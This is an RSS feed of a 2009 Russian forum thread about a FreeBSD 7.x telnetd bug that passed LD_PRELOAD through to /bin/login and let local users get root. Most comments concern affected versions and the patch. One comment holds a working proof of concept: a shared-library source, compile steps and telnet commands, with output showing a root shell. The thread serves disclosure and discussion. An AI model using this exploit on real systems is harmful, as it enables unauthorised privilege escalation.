<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: Получение root привилегий через telnetd демон во FreeBSD</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/49482.html</link>
    <description>В telnetd демоне, входящем в состав FreeBSD 7.x, обнаружена (http://lists.grok.org.uk/pipermail/full-disclosure/2009-February/067954.html) критическая уязвимость, позволяющая локальному злоумышленнику получить привилегии суперпользователя в системе. Предположительно проблеме подвержены OpenBSD, NetBSD и другие системы.&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;Эксплоит настолько прост, что вначале даже не верится, что он может работать. Уязвимость связана ненадлежащей чисткой переменных окружения перед вызовом /bin/login из telnetd (отсутствует чистка переменной окружения LD_PRELOAD, которую можно передать со стороны клиента, так как telnet протокол поддерживает передачу переменных окружения). Суть метода в подключении, через LD_PRELOAD простейшей библиотеки, запускающей /bin/sh в процедуре инициализации.  Библиотека должна находиться на атакуемом хосте. При этом в момент подключения к локальному telnetd серверу, злоумышленник без аутентификации получает root shell.&lt;br&gt;&lt;br&gt;&lt;br&gt;Теоретически на основе данной проблемы можно реализ...&lt;br&gt;&lt;br&gt;URL: http://lists.g</description>

<item>
    <title>Получение root привилегий через telnetd демон во FreeBSD (aurved)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/49482.html#45</link>
    <pubDate>Wed, 18 Feb 2009 11:16:46 GMT</pubDate>
    <description>recent changes in FreeBSD&apos;s environment-handling&lt;br&gt;code rendered telnetd&apos;s scrubbing inoperative, thereby allowing potentially&lt;br&gt;harmful environment variables to be set.&lt;br&gt;&lt;br&gt;RECENT CHANGES -- насколько я понял это только в 7.0 и 7.1 проявилось, поэтому и исправлений даже для 6-ой ветки нету. А в старых ветках в environment-handling&lt;br&gt;code не было этого.&lt;br&gt;</description>
</item>

<item>
    <title>Получение root привилегий через telnetd демон во FreeBSD (оп... (PereresusNeVlezaetBuggy)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/49482.html#44</link>
    <pubDate>Wed, 18 Feb 2009 06:10:53 GMT</pubDate>
    <description>&amp;gt;&#091;оверквотинг удален&#093;&lt;br&gt;&amp;gt;&lt;br&gt;&amp;gt;===&amp;gt;&lt;br&gt;&amp;gt;Дополнение 1: Опубликован официальный отчет от службы реагирования на проблемы безопасности FreeBSD. &lt;br&gt;&amp;gt;Уязвимости подвержены только FreeBSD 7.0-RELEASE, 7.1-RELEASE, 7-STABLE и 8-CURRENT. Исправление уже &lt;br&gt;&amp;gt;присутствует в выпусках 7.1-RELEASE-p10, 7.0-RELEASE-p3, 7.1-STABLE и доступно в виде патча. &lt;br&gt;&amp;gt;&lt;br&gt;&amp;gt;===&amp;gt;&lt;br&gt;&amp;gt;&lt;br&gt;&amp;gt;На самом деле должно быть 7.1-RELEASE-p3, 7.0-RELEASE-p10 &lt;br&gt;&amp;gt;Видимо переписывали из анонса FreeBSD - там такая же ошибка :) &lt;br&gt;&lt;br&gt;Тогда заодно стоит заменить&lt;br&gt;&lt;br&gt;&quot;Предположительно проблеме подвержены OpenBSD, NetBSD и другие системы.&quot;&lt;br&gt;&lt;br&gt;на&lt;br&gt;&lt;br&gt;&quot;NetBSD и OpenBSD проблеме не подвержены, в DragonFly BSD проблема исправлена 14.02.2008; однако другие *BSD-системы могут всё ещё содержать уязвимость.&quot;&lt;br&gt;</description>
</item>

<item>
    <title>Получение root привилегий через telnetd демон во FreeBSD (опубликован патч) (Осторожный)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/49482.html#43</link>
    <pubDate>Wed, 18 Feb 2009 06:03:41 GMT</pubDate>
    <description>В заголовке новости ошибка - исправьте !!!&lt;br&gt;&lt;br&gt;===&amp;gt;&lt;br&gt;Дополнение 1: Опубликован официальный отчет от службы реагирования на проблемы безопасности FreeBSD. Уязвимости подвержены только FreeBSD 7.0-RELEASE, 7.1-RELEASE, 7-STABLE и 8-CURRENT. Исправление уже присутствует в выпусках 7.1-RELEASE-p10, 7.0-RELEASE-p3, 7.1-STABLE и доступно в виде патча. &lt;br&gt;===&amp;gt;&lt;br&gt;&lt;br&gt;На самом деле должно быть 7.1-RELEASE-p3, 7.0-RELEASE-p10&lt;br&gt;Видимо переписывали из анонса FreeBSD - там такая же ошибка :)&lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>Получение root привилегий через telnetd демон во FreeBSD (Аноним)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/49482.html#42</link>
    <pubDate>Tue, 17 Feb 2009 18:47:53 GMT</pubDate>
    <description>&amp;gt; Неужели в природе есть люди не сканящие свой сервер или рабочую станцию nmap и оставляющие ненужные демоны?!&lt;br&gt;&lt;br&gt;для проверки на ненужные сервисы совсем не обязательно ставить nmap. Хватит и штатного sockstat(1). Напр.&lt;br&gt;&lt;br&gt;    sockstat -l46&lt;br&gt;</description>
</item>

<item>
    <title>Получение root привилегий через telnetd демон во FreeBSD (Frank)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/49482.html#41</link>
    <pubDate>Tue, 17 Feb 2009 13:00:33 GMT</pubDate>
    <description>боюсь, сервак с 2000 vps загнётся ещё до логинов по ssh, от одного только количества запущенных процессов :)&lt;br&gt;</description>
</item>

<item>
    <title>Получение root привилегий через telnetd демон во FreeBSD (metallic)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/49482.html#40</link>
    <pubDate>Tue, 17 Feb 2009 10:32:46 GMT</pubDate>
    <description>&amp;gt;telnet довольно давно умеет шифрование делать. &lt;br&gt;&lt;br&gt;А оно надо?&lt;br&gt;</description>
</item>

<item>
    <title>Получение root привилегий через telnetd демон во FreeBSD (metallic)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/49482.html#39</link>
    <pubDate>Tue, 17 Feb 2009 10:32:24 GMT</pubDate>
    <description>Расслабьтесь, я пошутил :)&lt;br&gt;</description>
</item>

<item>
    <title>Получение root привилегий через telnetd демон во FreeBSD (опубликован патч) (Гость)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/49482.html#38</link>
    <pubDate>Tue, 17 Feb 2009 07:08:44 GMT</pubDate>
    <description>Кому интересно...&lt;br&gt;&lt;br&gt;&#037;id&lt;br&gt;uid=1001(test) gid=1001(test) groups=1001(test)&lt;br&gt;&#037;cd /tmp&lt;br&gt;&#037;cat &amp;gt;test.c&lt;br&gt;#include &amp;lt;sys/types.h&amp;gt;&lt;br&gt;#include &amp;lt;login_cap.h&amp;gt;&lt;br&gt;#include &amp;lt;stdio.h&amp;gt;&lt;br&gt;  &lt;br&gt;int&lt;br&gt;setusercontext(login_cap_t *lc, const struct passwd *pwd, uid_t uid,&lt;br&gt;        unsigned int flags)&lt;br&gt;&#123; &lt;br&gt;        printf(&quot;Xa-xa!&#092;n&quot;);&lt;br&gt;        return (0);&lt;br&gt;&#125;&lt;br&gt;&#037;cc -c -o test.so -fPIC test.c&lt;br&gt;&#037;cc -shared -o libtest.so.0.0 test.so&lt;br&gt;&#037;telnet&lt;br&gt;telnet&amp;gt; aut dis sra&lt;br&gt;telnet&amp;gt; env def LD_PRELOAD /tmp/libtest.so.0.0&lt;br&gt;telnet&amp;gt; ope localhost&lt;br&gt;Trying 127.0.0.1...  &lt;br&gt;Connected to localhost.&lt;br&gt;Escape character is &apos;^&#093;&apos;.&lt;br&gt;&lt;br&gt;FreeBSD/i386 (shit.home.lan) (ttyp3)&lt;br&gt;&lt;br&gt;Password:&lt;br&gt;Xa-xa!   &lt;br&gt;Last login: Tue Feb 17 12:51:07 from form.win.alveis.&lt;br&gt;Xa-xa!&lt;br&gt;Copyright (c) 1992-2009 The FreeBSD Project.&lt;br&gt;Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994&lt;br&gt;        The Regents of the University of California. All rights reserved.&lt;br&gt;&lt;br&gt;FreeBSD 7.1-RELEASE (GENERIC) #0: Thu Jan  1 14:37:25 UTC 2009&lt;br&gt;&lt;br&gt;Welcome to FreeBSD!&lt;br&gt;&lt;br&gt;&lt;br&gt;&#037;id&lt;br&gt;uid=0(root) gid=0(wheel) </description>
</item>

<item>
    <title>Получение root привилегий через telnetd демон во FreeBSD (опубликован патч) (Гость)</title>
    <link>https://www.opennet.ru/openforum/vsluhforumID3/49482.html#37</link>
    <pubDate>Tue, 17 Feb 2009 07:07:12 GMT</pubDate>
    <description>Вопрос не в скане - телнет никто в здравом уме не включит, а по умолчанию он выключен. Вопрос в том, что в принципе дыра в программе есть...&lt;br&gt;</description>
</item>

</channel>
</rss>
